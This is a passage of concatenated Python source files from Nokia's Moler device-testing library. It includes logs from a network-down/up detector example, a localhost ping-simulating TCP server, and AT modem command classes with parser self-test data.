15:28:32 |moler.user.app-code | Thread-4 |Network 10.0.2.16 is back "up" from 15:28:32
15:28:32 |moler.user.app-code | Thread-3 |exiting ping_observing_task(10.0.2.15)
15:28:32 |moler.user.app-code | Thread-4 |exiting ping_observing_task(10.0.2.16)
15:28:32 |asyncio.main | MainThread |all jobs observing connections are done
15:28:32 |threaded.ping.tcp-server(5671) | Thread-1 |Ping Sim: ... bye
15:28:32 |threaded.ping.tcp-server(5672) | Thread-2 |Ping Sim: ... bye
15:28:32 |asyncio | Thread-5 |poll took 255.669 ms: 1 events
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |... await stop_event done
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |... asyncio-in-thrd loop done
15:28:34 |threaded.ping.tcp-server(5672 -> 43373) | Thread-6 |Connection closed
15:28:34 |threaded.ping.tcp-server(5671 -> 49571) | Thread-8 |Connection closed
15:28:34 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Dummy-10 |shutting down
15:28:34 |asyncio | Dummy-10 |Close <_UnixSelectorEventLoop running=False closed=False debug=True>
'''
```
#### File: layer_3/threaded/network_down_detectors_on_tcp_conn_v3.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import logging
import sys
import os
import threading
import time
from moler.threaded_moler_connection import ThreadedMolerConnection
from moler.io.raw import tcp
from moler.connection_factory import get_connection, ConnectionFactory
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "..")) # allow finding modules in examples/
from network_toggle_observers import NetworkDownDetector, NetworkUpDetector
# ===================== Moler's connection-observer usage ======================
def ping_observing_task(ext_io_connection, ping_ip):
"""
Here external-IO connection is abstract - we don't know its type.
What we know is just that it has .moler_connection attribute.
"""
logger = logging.getLogger('moler.user.app-code')
conn_addr = str(ext_io_connection)
# Layer 2 of Moler's usage (ext_io_connection + runner):
# 3. create observers on Moler's connection
net_down_detector = NetworkDownDetector(ping_ip)
net_down_detector.connection = ext_io_connection.moler_connection
net_up_detector = NetworkUpDetector(ping_ip)
net_up_detector.connection = ext_io_connection.moler_connection
info = '{} on {} using {}'.format(ping_ip, conn_addr, net_down_detector)
logger.debug('observe ' + info)
# 4. start observer (nonblocking, using as future)
net_down_detector.start() # should be started before we open connection
# to not loose first data on connection
with ext_io_connection.open():
# 5. await that observer to complete
net_down_time = net_down_detector.await_done(timeout=10)
timestamp = time.strftime("%H:%M:%S", time.localtime(net_down_time))
logger.debug('Network {} is down from {}'.format(ping_ip, timestamp))
# 6. call next observer (blocking till completes)
info = '{} on {} using {}'.format(ping_ip, conn_addr, net_up_detector)
logger.debug('observe ' + info)
# using as synchronous function (so we want verb to express action)
detect_network_up = net_up_detector
net_up_time = detect_network_up()
timestamp = time.strftime("%H:%M:%S", time.localtime(net_up_time))
logger.debug('Network {} is back "up" from {}'.format(ping_ip, timestamp))
# ==============================================================================
def main(connections2observe4ip):
# Starting the clients
connections = []
for address, ping_ip in connections2observe4ip:
host, port = address
# ------------------------------------------------------------------
# This front-end code hides parallelism variant
# used to read data from connection.
# We don't care if it is TCP connection based on threads or asyncio.
# All we want here is "any TCP connection towards given host/port".
# "any" means here: TCP variant as configured on backend.
# ------------------------------------------------------------------
tcp_connection = get_connection(io_type='tcp', host=host, port=port)
client_thread = threading.Thread(target=ping_observing_task,
args=(tcp_connection, ping_ip))
client_thread.start()
connections.append(client_thread)
# await observers job to be done
for client_thread in connections:
client_thread.join()
# ==============================================================================
if __name__ == '__main__':
from threaded_ping_server import start_ping_servers, stop_ping_servers
import os
from moler.config import load_config
# -------------------------------------------------------------------
# Configure moler connections (backend code)
# ver.3 - configure by YAML config file
load_config(config=os.path.join(os.path.dirname(__file__), "..", "connections_new_variant.yml"))
# configure class used to realize tcp-threaded-connection
# (default one tcp.ThreadedTcp has no logger)
# This constitutes plugin system - you can exchange connection implementation
def tcp_thd_conn(port, host='localhost', name=None):
moler_conn = ThreadedMolerConnection(decoder=lambda data: data.decode("utf-8"))
conn_logger_name = 'threaded.tcp-connection({}:{})'.format(host, port)
conn_logger = logging.getLogger(conn_logger_name)
io_conn = tcp.ThreadedTcp(moler_connection=moler_conn,
port=port, host=host, logger=conn_logger)
return io_conn
ConnectionFactory.register_construction(io_type="tcp",
variant="threaded-and-logged",
constructor=tcp_thd_conn)
# -------------------------------------------------------------------
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s |%(name)-40s |%(message)s',
datefmt='%H:%M:%S',
stream=sys.stderr,
)
connections2observe4ip = [(('localhost', 5671), '10.0.2.15'),
(('localhost', 5672), '10.0.2.16')]
servers = start_ping_servers(connections2observe4ip)
main(connections2observe4ip)
stop_ping_servers(servers)
'''
LOG OUTPUT
15:45:31 |threaded.ping.tcp-server(5671) |Ping Sim started at tcp://localhost:5671
15:45:31 |threaded.ping.tcp-server(5672) |Ping Sim started at tcp://localhost:5672
15:45:31 |moler.runner.thread-pool |created
15:45:31 |moler.runner.thread-pool |created own executor <concurrent.futures.thread.ThreadPoolExecutor object at 0x0000000002E35320>
15:45:31 |moler.runner.thread-pool |created
15:45:31 |moler.runner.thread-pool |created
15:45:31 |moler.runner.thread-pool |created own executor <concurrent.futures.thread.ThreadPoolExecutor object at 0x0000000002E35710>
15:45:31 |moler.runner.thread-pool |created own executor <concurrent.futures.thread.ThreadPoolExecutor object at 0x0000000002E357F0>
15:45:31 |moler.runner.thread-pool |created
15:45:31 |moler.user.app-code |observe 10.0.2.15 on tcp://localhost:5671 using NetworkDownDetector(id:2e35240)
15:45:31 |moler.runner.thread-pool |created own executor <concurrent.futures.thread.ThreadPoolExecutor object at 0x0000000002E35B00>
15:45:31 |moler.runner.thread-pool |go background: NetworkDownDetector(id:2e35240, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>])
15:45:31 |moler.user.app-code |observe 10.0.2.16 on tcp://localhost:5672 using NetworkDownDetector(id:2e356d8)
15:45:31 |moler.runner.thread-pool |subscribing for data NetworkDownDetector(id:2e35240, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>])
15:45:31 |moler.runner.thread-pool |go background: NetworkDownDetector(id:2e356d8, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>])
15:45:31 |moler.runner.thread-pool |subscribing for data NetworkDownDetector(id:2e356d8, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>])
15:45:31 |threaded.tcp-connection(localhost:5671) |connecting to tcp://localhost:5671
15:45:31 |threaded.tcp-connection(localhost:5672) |connecting to tcp://localhost:5672
15:45:31 |threaded.tcp-connection(localhost:5671) |connection tcp://localhost:5671 is open
15:45:31 |moler.runner.thread-pool |go foreground: NetworkDownDetector(id:2e35240, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>]) - await max. 10 [sec]
15:45:31 |threaded.tcp-connection(localhost:5672) |connection tcp://localhost:5672 is open
15:45:31 |threaded.ping.tcp-server(5671 -> 55946) |connection accepted - client at tcp://127.0.0.1:55946
15:45:31 |threaded.ping.tcp-server(5672 -> 55947) |connection accepted - client at tcp://127.0.0.1:55947
15:45:31 |moler.runner.thread-pool |go foreground: NetworkDownDetector(id:2e356d8, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>]) - await max. 10 [sec]
15:45:31 |threaded.tcp-connection(localhost:5671) |< b'\n'
15:45:31 |moler.connection.2df4f28 |
15:45:31 |threaded.tcp-connection(localhost:5672) |< b'\n'
15:45:31 |moler.connection.2e35400 |
15:45:32 |threaded.tcp-connection(localhost:5672) |< b'greg@debian:~$ ping 10.0.2.16\n'
15:45:32 |moler.connection.2e35400 |greg@debian:~$ ping 10.0.2.16
15:45:32 |threaded.tcp-connection(localhost:5671) |< b'greg@debian:~$ ping 10.0.2.15\n'
15:45:32 |moler.connection.2df4f28 |greg@debian:~$ ping 10.0.2.15
15:45:33 |threaded.tcp-connection(localhost:5671) |< b'PING 10.0.2.15 (10.0.2.15) 56(84) bytes of data.\n'
15:45:33 |moler.connection.2df4f28 |PING 10.0.2.15 (10.0.2.15) 56(84) bytes of data.
15:45:33 |threaded.tcp-connection(localhost:5672) |< b'PING 10.0.2.16 (10.0.2.16) 56(84) bytes of data.\n'
15:45:33 |moler.connection.2e35400 |PING 10.0.2.16 (10.0.2.16) 56(84) bytes of data.
15:45:34 |threaded.tcp-connection(localhost:5672) |< b'64 bytes from 10.0.2.16: icmp_req=1 ttl=64 time=0.080 ms\n'
15:45:34 |moler.connection.2e35400 |64 bytes from 10.0.2.16: icmp_req=1 ttl=64 time=0.080 ms
15:45:34 |threaded.tcp-connection(localhost:5671) |< b'64 bytes from 10.0.2.15: icmp_req=1 ttl=64 time=0.080 ms\n'
15:45:34 |moler.connection.2df4f28 |64 bytes from 10.0.2.15: icmp_req=1 ttl=64 time=0.080 ms
15:45:35 |threaded.tcp-connection(localhost:5671) |< b'64 bytes from 10.0.2.15: icmp_req=2 ttl=64 time=0.037 ms\n'
15:45:35 |moler.connection.2df4f28 |64 bytes from 10.0.2.15: icmp_req=2 ttl=64 time=0.037 ms
15:45:35 |threaded.tcp-connection(localhost:5672) |< b'64 bytes from 10.0.2.16: icmp_req=2 ttl=64 time=0.037 ms\n'
15:45:35 |moler.connection.2e35400 |64 bytes from 10.0.2.16: icmp_req=2 ttl=64 time=0.037 ms
15:45:36 |threaded.tcp-connection(localhost:5671) |< b'64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms\n'
15:45:36 |moler.connection.2df4f28 |64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms
15:45:36 |threaded.tcp-connection(localhost:5672) |< b'64 bytes from 10.0.2.16: icmp_req=3 ttl=64 time=0.045 ms\n'
15:45:36 |moler.connection.2e35400 |64 bytes from 10.0.2.16: icmp_req=3 ttl=64 time=0.045 ms
15:45:37 |threaded.tcp-connection(localhost:5671) |< b'ping: sendmsg: Network is unreachable\n'
15:45:37 |moler.connection.2df4f28 |ping: sendmsg: Network is unreachable
15:45:37 |moler.NetworkDownDetector(id:2e35240) |Network 10.0.2.15 is down!
15:45:37 |threaded.tcp-connection(localhost:5672) |< b'ping: sendmsg: Network is unreachable\n'
15:45:37 |moler.connection.2e35400 |ping: sendmsg: Network is unreachable
15:45:37 |moler.NetworkDownDetector(id:2e356d8) |Network 10.0.2.16 is down!
15:45:37 |moler.runner.thread-pool |done & unsubscribing NetworkDownDetector(id:2e35240, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>])
15:45:37 |moler.runner.thread-pool |returning result NetworkDownDetector(id:2e35240)
15:45:37 |moler.runner.thread-pool |done & unsubscribing NetworkDownDetector(id:2e356d8, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>])
15:45:37 |moler.runner.thread-pool |returning result NetworkDownDetector(id:2e356d8)
15:45:37 |moler.runner.thread-pool |shutting down
15:45:37 |moler.runner.thread-pool |shutting down
15:45:37 |moler.runner.thread-pool |NetworkDownDetector(id:2e35240) returned 1528983937.2623792
15:45:37 |moler.runner.thread-pool |NetworkDownDetector(id:2e356d8) returned 1528983937.263379
15:45:37 |moler.user.app-code |Network 10.0.2.15 is down from 15:45:37
15:45:37 |moler.user.app-code |observe 10.0.2.15 on tcp://localhost:5671 using NetworkUpDetector(id:2e35630)
15:45:37 |moler.user.app-code |Network 10.0.2.16 is down from 15:45:37
15:45:37 |moler.user.app-code |observe 10.0.2.16 on tcp://localhost:5672 using NetworkUpDetector(id:2e35978)
15:45:37 |moler.runner.thread-pool |go background: NetworkUpDetector(id:2e35978, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>])
15:45:37 |moler.runner.thread-pool |subscribing for data NetworkUpDetector(id:2e35978, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>])
15:45:37 |moler.runner.thread-pool |go background: NetworkUpDetector(id:2e35630, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>])
15:45:37 |moler.runner.thread-pool |subscribing for data NetworkUpDetector(id:2e35630, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>])
15:45:37 |moler.runner.thread-pool |go foreground: NetworkUpDetector(id:2e35978, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>]) - await max. None [sec]
15:45:37 |moler.runner.thread-pool |go foreground: NetworkUpDetector(id:2e35630, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>]) - await max. None [sec]
15:45:38 |threaded.tcp-connection(localhost:5671) |< b'ping: sendmsg: Network is unreachable\n'
15:45:38 |moler.connection.2df4f28 |ping: sendmsg: Network is unreachable
15:45:38 |threaded.tcp-connection(localhost:5672) |< b'ping: sendmsg: Network is unreachable\n'
15:45:38 |moler.connection.2e35400 |ping: sendmsg: Network is unreachable
15:45:39 |threaded.tcp-connection(localhost:5671) |< b'ping: sendmsg: Network is unreachable\n'
15:45:39 |moler.connection.2df4f28 |ping: sendmsg: Network is unreachable
15:45:39 |threaded.tcp-connection(localhost:5672) |< b'ping: sendmsg: Network is unreachable\n'
15:45:39 |moler.connection.2e35400 |ping: sendmsg: Network is unreachable
15:45:40 |threaded.tcp-connection(localhost:5671) |< b'64 bytes from 10.0.2.15: icmp_req=7 ttl=64 time=0.123 ms\n'
15:45:40 |moler.connection.2df4f28 |64 bytes from 10.0.2.15: icmp_req=7 ttl=64 time=0.123 ms
15:45:40 |moler.NetworkUpDetector(id:2e35630) |Network 10.0.2.15 is up!
15:45:40 |threaded.tcp-connection(localhost:5672) |< b'64 bytes from 10.0.2.16: icmp_req=7 ttl=64 time=0.123 ms\n'
15:45:40 |moler.connection.2e35400 |64 bytes from 10.0.2.16: icmp_req=7 ttl=64 time=0.123 ms
15:45:40 |moler.NetworkUpDetector(id:2e35978) |Network 10.0.2.16 is up!
15:45:40 |moler.runner.thread-pool |done & unsubscribing NetworkUpDetector(id:2e35978, using ThreadedMolerConnection(id:2e35400)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E354A8>>])
15:45:40 |moler.runner.thread-pool |returning result NetworkUpDetector(id:2e35978)
15:45:40 |moler.runner.thread-pool |done & unsubscribing NetworkUpDetector(id:2e35630, using ThreadedMolerConnection(id:2df4f28)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x0000000002E350F0>>])
15:45:40 |moler.runner.thread-pool |returning result NetworkUpDetector(id:2e35630)
15:45:40 |moler.runner.thread-pool |shutting down
15:45:40 |moler.runner.thread-pool |NetworkUpDetector(id:2e35978) returned 1528983940.2635787
15:45:40 |moler.user.app-code |Network 10.0.2.16 is back "up" from 15:45:40
15:45:40 |moler.runner.thread-pool |shutting down
15:45:40 |moler.runner.thread-pool |NetworkUpDetector(id:2e35630) returned 1528983940.2625787
15:45:40 |moler.user.app-code |Network 10.0.2.15 is back "up" from 15:45:40
15:45:40 |threaded.tcp-connection(localhost:5671) |connection tcp://localhost:5671 is closed
15:45:40 |threaded.tcp-connection(localhost:5672) |connection tcp://localhost:5672 is closed
15:45:40 |threaded.ping.tcp-server(5671) |Ping Sim: ... bye
15:45:40 |threaded.ping.tcp-server(5672) |Ping Sim: ... bye
15:45:42 |threaded.ping.tcp-server(5671 -> 55946) |Connection closed
15:45:42 |threaded.ping.tcp-server(5672 -> 55947) |Connection closed
15:45:42 |moler.runner.thread-pool |shutting down
15:45:42 |moler.runner.thread-pool |shutting down
15:45:42 |moler.runner.thread-pool |shutting down
15:45:42 |moler.runner.thread-pool |shutting down
'''
```
#### File: moler/examples/threaded_ping_server.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import logging
import select
import socket
import sys
import threading
import time
from contextlib import closing
ping_output = '''
greg@debian:~$ ping 10.0.2.15
PING 10.0.2.15 (10.0.2.15) 56(84) bytes of data.
64 bytes from 10.0.2.15: icmp_req=1 ttl=64 time=0.080 ms
64 bytes from 10.0.2.15: icmp_req=2 ttl=64 time=0.037 ms
64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms
ping: sendmsg: Network is unreachable
ping: sendmsg: Network is unreachable
ping: sendmsg: Network is unreachable
64 bytes from 10.0.2.15: icmp_req=7 ttl=64 time=0.123 ms
64 bytes from 10.0.2.15: icmp_req=8 ttl=64 time=0.056 ms
'''
def ping_sim_tcp_server(server_port, ping_ip, client, address):
_, client_port = address
logger = logging.getLogger('threaded.ping.tcp-server({} -> {})'.format(server_port,
client_port))
logger.debug('connection accepted - client at tcp://{}:{}'.format(*address))
ping_out = ping_output.replace("10.0.2.15", ping_ip)
ping_lines = ping_out.splitlines(True)
with closing(client):
for ping_line in ping_lines:
data = ping_line.encode(encoding='utf-8')
try:
client.sendall(data)
except socket.error: # client is gone
break
time.sleep(1) # simulate delay between ping lines
logger.info('Connection closed')
def server_loop(server_port, server_socket, ping_ip, done_event):
logger = logging.getLogger('threaded.ping.tcp-server({})'.format(server_port))
while not done_event.is_set():
# without select we can't break loop from outside (via done_event)
# since .accept() is blocking
read_sockets, _, _ = select.select([server_socket], [], [], 0.1)
if not read_sockets:
continue
client_socket, client_addr = server_socket.accept()
client_socket.setblocking(1)
client_thread = threading.Thread(target=ping_sim_tcp_server,
args=(server_port, ping_ip,
client_socket, client_addr))
client_thread.start()
logger.debug("Ping Sim: ... bye")
def start_ping_sim_server(server_address, ping_ip):
"""Run server simulating ping command output, this is one-shot server"""
_, server_port = server_address
logger = logging.getLogger('threaded.ping.tcp-server({})'.format(server_port))
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(server_address)
server_socket.listen(1)
logger.debug("Ping Sim started at tcp://{}:{}".format(*server_address))
done_event = threading.Event()
server_thread = threading.Thread(target=server_loop,
args=(server_port, server_socket, ping_ip,
done_event))
server_thread.start()
return server_thread, done_event
def tcp_connection(address, moler_conn):
"""Forwarder reading from tcp network transport layer"""
logger = logging.getLogger('threaded.tcp-connection({}:{})'.format(*address))
logger.debug('... connecting to tcp://{}:{}'.format(*address))
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(address)
with closing(client_socket):
while True:
data = client_socket.recv(128)
if data:
logger.debug('<<< {!r}'.format(data))
# Forward received data into Moler's connection
moler_conn.data_received(data)
yield data
else:
logger.debug("... closed")
break
def start_ping_servers(servers_addr):
servers = []
for address, ping_ip in servers_addr:
# simulate pinging given IP
server_thread, server_done = start_ping_sim_server(address, ping_ip)
servers.append((server_thread, server_done))
return servers
def stop_ping_servers(servers):
for server_thread, server_done in servers:
server_done.set()
server_thread.join()
# ==============================================================================
if __name__ == '__main__':
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s |%(name)-40s |%(message)s',
datefmt='%H:%M:%S',
stream=sys.stderr,
)
connections2serve = [(('localhost', 5671), '10.0.2.15'),
(('localhost', 5672), '10.0.2.16')]
servers = start_ping_servers(connections2serve)
time.sleep(2)
stop_ping_servers(servers)
```
#### File: cmd/at/attach.py
```python
__author__ = ' <NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
from moler.cmd.at.genericat import GenericAtCommand
class Attach(GenericAtCommand):
"""
Command to trigger attach. Example output:
AT+CGATT=1
OK
"""
def __init__(self, connection=None, prompt=None, newline_chars=None, runner=None):
"""Create instance of Attach class"""
super(Attach, self).__init__(connection, operation="execute", prompt=prompt,
newline_chars=newline_chars, runner=runner)
self.timeout = 180
self.ret_required = False
def build_command_string(self):
return "AT+CGATT=1"
# -----------------------------------------------------------------------------
# Following documentation is required for library CI.
# It is used to perform command self-test.
#
# Moreover, it documents what will be COMMAND_RESULT when command
# is run with COMMAND_KWARGS on COMMAND_OUTPUT data coming from connection.
#
# When you need to show parsing of multiple outputs just add suffixes:
# COMMAND_OUTPUT_suffix
# COMMAND_KWARGS_suffix
# COMMAND_RESULT_suffix
# -----------------------------------------------------------------------------
COMMAND_OUTPUT_ver_execute = """
AT+CGATT=1
OK
"""
COMMAND_KWARGS_ver_execute = {}
COMMAND_RESULT_ver_execute = {}
```
#### File: cmd/at/enable_echo.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020-2021, Nokia'
__email__ = '<EMAIL>'
from moler.cmd.at.genericat import GenericAtCommand
class EnableEcho(GenericAtCommand):
"""
Command to enable echo. Example output:
ATE1
OK
"""
def __init__(self, connection=None, prompt=None, newline_chars=None, runner=None):
"""
:param connection: moler connection to device
:param prompt: start prompt (on system where command cd starts)
:param newline_chars: Characters to split lines
:param runner: Runner to run command
"""
super(EnableEcho, self).__init__(connection, operation="execute", prompt=prompt,
newline_chars=newline_chars, runner=runner)
self.ret_required = False
def build_command_string(self):
"""
Builds command string from parameters passed to object.
:return: String representation of command to send over connection to device.
"""
return "ATE1"
# -----------------------------------------------------------------------------
# Following documentation is required for library CI.
# It is used to perform command self-test.
#
# Moreover, it documents what will be COMMAND_RESULT when command
# is run with COMMAND_KWARGS on COMMAND_OUTPUT data coming from connection.
#
# When you need to show parsing of multiple outputs just add suffixes:
# COMMAND_OUTPUT_suffix
# COMMAND_KWARGS_suffix
# COMMAND_RESULT_suffix
# -----------------------------------------------------------------------------
COMMAND_OUTPUT_ver_execute = """
ATE1
OK
"""
COMMAND_KWARGS_ver_execute = {}
COMMAND_RESULT_ver_execute = {}
```
#### File: cmd/at/genericat.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import re
import abc
import six
from moler.cmd.commandtextualgeneric import CommandTextualGeneric
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
@six.add_metaclass(abc.ABCMeta)
class GenericAtCommand(CommandTextualGeneric):
_re_default_at_prompt = re.compile(r'^\s*(OK|NO CARRIER|ERROR|\+CM[ES]\s+ERROR:\s*\S.+)\s*$') # When user provides no prompt
def __init__(self, connection, operation="execute", prompt=None, newline_chars=None, runner=None):
"""
Create instance of At class - base class for all AT commands
:param connection: connection used to send command and receive its output
:param operation: "execute", "read", "test" (not all AT commands support all modes)
:param prompt: prompt (on system where command runs).
:param newline_chars: Characters to split lines - list.
:param runner: Runner to run command.
"""
if prompt is None:
prompt = self._re_default_at_prompt
self.operation = operation # for 'read' command ends with '?', for 'test' ends with '=?'
super(GenericAtCommand, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,
runner=runner)
if operation not in ["execute", "read", "test"]:
raise CommandFailure(self, "{} mode not supported".format(operation))
# TODO: do we have any way to stop AT cmd?
self.terminating_timeout = 0 # no additional timeout for Ctrl-C..till..prompt (shutdown after cmd timeout)
def on_new_line(self, line, is_full_line):
"""
Method to parse command output. Will be called after line with command echo.
Write your own implementation but don't forget to call on_new_line from base class
:param line: Line to parse, new lines are trimmed
:param is_full_line: False for chunk of line; True on full line (NOTE: new line character removed)
:return: None
"""
if is_full_line:
try:
self._parse_error_response(line)
except ParsingDone:
pass
return super(GenericAtCommand, self).on_new_line(line, is_full_line)
def _is_at_cmd_echo(self, line):
return self._regex_helper.search_compiled(self._cmd_escaped, line)
_re_error = re.compile(r'^\s*(ERROR|NO CARRIER)\s*$')
_re_cme_error = re.compile(r'^\+(?P<ERR_TYPE>CM[ES])\s+ERROR:\s*(?P<ERROR>\S.+)', flags=re.IGNORECASE)
def _parse_error_response(self, line):
"""
When command itself is invalid or cannot be performed for some reason,
or mobile termination error reporting is disabled:
at+cmd
ERROR
When command was not processed due to an error related to MT operation:
at+cmd
+CME ERROR: result code
See https://www.smssolutions.net/tutorials/gsm/gsmerrorcodes/
"""
if self._regex_helper.match_compiled(self._re_cme_error, line):
error_type = self._regex_helper.group("ERR_TYPE")
error_info = self._regex_helper.group("ERROR")
self.set_exception(CommandFailure(self, "{} ERROR: {}".format(error_type, error_info)))
raise ParsingDone
elif self._regex_helper.match_compiled(self._re_error, line):
error_info = self._regex_helper.group(1)
self.set_exception(CommandFailure(self, error_info))
raise ParsingDone
```
#### File: cmd/at/get_imei.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import re
from moler.cmd.at.genericat import GenericAtCommand
from moler.exceptions import ParsingDone
class GetImei(GenericAtCommand):
"""
Command to get product serial number identification. Example output:
AT+CGSN
490154203237518
AT+CGSN=1
+CGSN: "490154203237518"
OK
"""
def __init__(self, connection=None, sn_type="default", prompt=None, newline_chars=None, runner=None):
"""
Create instance of GetImei class
See 3gpp documentation for SN type values:
<snt>: integer type indicating the serial number type that has been requested.
0 returns <sn> Serial Number as defined by manufacturer, typically it is IMEI
1 returns the IMEI (International Mobile station Equipment Identity)
2 returns the IMEISV (International Mobile station Equipment Identity and Software Version number)
3 returns the SVN (Software Version Number)
:param sn_type: "default", "imei", "imeisv", "svn"
"""
super(GetImei, self).__init__(connection, operation='execute', prompt=prompt,
newline_chars=newline_chars, runner=runner)
self.sn_type = sn_type
_serial_variants = {"default": "AT+CGSN",
"imei": "AT+CGSN=1",
"imeisv": "AT+CGSN=1",
"svn": "AT+CGSN=2"}
def build_command_string(self):
cmd = self._serial_variants[self.sn_type]
return cmd
def on_new_line(self, line, is_full_line):
"""
Method to parse command output. Will be called after line with command echo.
490154203237518
or
+CGSN: "490154203237518"
OK
Write your own implementation but don't forget to call on_new_line from base class
:param line: Line to parse, new lines are trimmed
:param is_full_line: False for chunk of line; True on full line (NOTE: new line character removed)
:return: None
"""
if is_full_line:
try:
self._parse_imei(line)
except ParsingDone:
pass
return super(GetImei, self).on_new_line(line, is_full_line)
_re_sn = re.compile(r'^\s*(?P<sn>\S.*)\s*$')
_re_imei = re.compile(r'^\s*\+CGSN: "(?P<tac>\d{8})(?P<snr>\d{6})(?P<cd>\d{1})"\s*$') # taken from standard
_re_imeisv = re.compile(r'(?P<tac>\d{8})(?P<snr>\d{6})(?P<svn>\d{2})') # TODO: need real output example
_re_svn = re.compile(r'(?P<svn>\d{2})') # TODO: need real output example
def _parse_imei(self, line):
"""
Parse serial_number identification that may look like:
490154203237518
or
+CGSN: "490154203237518"
"""
if self.sn_type == 'default':
if self._regex_helper.match_compiled(self._re_sn, line):
sn = self._regex_helper.group("sn")
self.current_ret['imei'] = sn
raise ParsingDone
elif self.sn_type == 'imei':
if self._regex_helper.match_compiled(self._re_imei, line):
imei_parts = self._regex_helper.groupdict()
self.current_ret.update(imei_parts)
self.current_ret["imei"] = "{}{}{}".format(imei_parts["tac"], imei_parts["snr"], imei_parts["cd"])
raise ParsingDone
# TODO: 'imeisv' and 'svn' taken from latest AT standard; need real life examples to put into COMMAND_OUTPUT
#
# elif self.sn_type == 'imeisv':
# if self._regex_helper.match_compiled(self._re_imeisv, line):
# imei_parts = self._regex_helper.groupdict()
# self.current_ret.update(imei_parts)
# self.current_ret["imeisv"] = "{}{}{}".format(imei_parts["tac"], imei_parts["snr"], imei_parts["svn"])
# raise ParsingDone
#
# elif self.sn_type == 'svn':
# if self._regex_helper.match_compiled(self._re_svn, line):
# svn = self._regex_helper.group("svn")
# self.current_ret["svn"] = svn
# raise ParsingDone
def is_end_of_cmd_output(self, line):
"""
Checks if end of command is reached.
AT+CGSN and AT+CGSN=0 are not finished by OK, so such cmd is finished when it detects serial_number
:param line: Line from device.
:return:
"""
if self.sn_type == 'default':
return 'imei' in self.current_ret
return super(GetImei, self).is_end_of_cmd_output(line)
# -----------------------------------------------------------------------------
# Following documentation is required for library CI.
# It is used to perform command self-test.
#
# Moreover, it documents what will be COMMAND_RESULT when command
# is run with COMMAND_KWARGS on COMMAND_OUTPUT data coming from connection.
#
# When you need to show parsing of multiple outputs just add suffixes:
# COMMAND_OUTPUT_suffix
# COMMAND_KWARGS_suffix
# COMMAND_RESULT_suffix
# -----------------------------------------------------------------------------
COMMAND_OUTPUT_ver_default = """
AT+CGSN
490154203237518
"""
COMMAND_KWARGS_ver_default = {}
COMMAND_RESULT_ver_default = {
'imei': '490154203237518'
}
# -----------------------------------------------------------------------------
COMMAND_OUTPUT_ver_imei = '''
AT+CGSN=1
+CGSN: "490154203237518"
OK
'''
COMMAND_KWARGS_ver_imei = {'sn_type': 'imei'}
COMMAND_RESULT_ver_imei = {
'imei': '490154203237518',
'tac': '49015420',
'snr': '323751',
'cd': '8',
}
# -----------------------------------------------------------------------------
```
#### File: cmd/juniper/genericjuniper.py
```python
from moler.cmd.commandtextualgeneric import CommandTextualGeneric
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
class GenericJuniperCommand(CommandTextualGeneric):
"""Genericjunipercommand command class."""
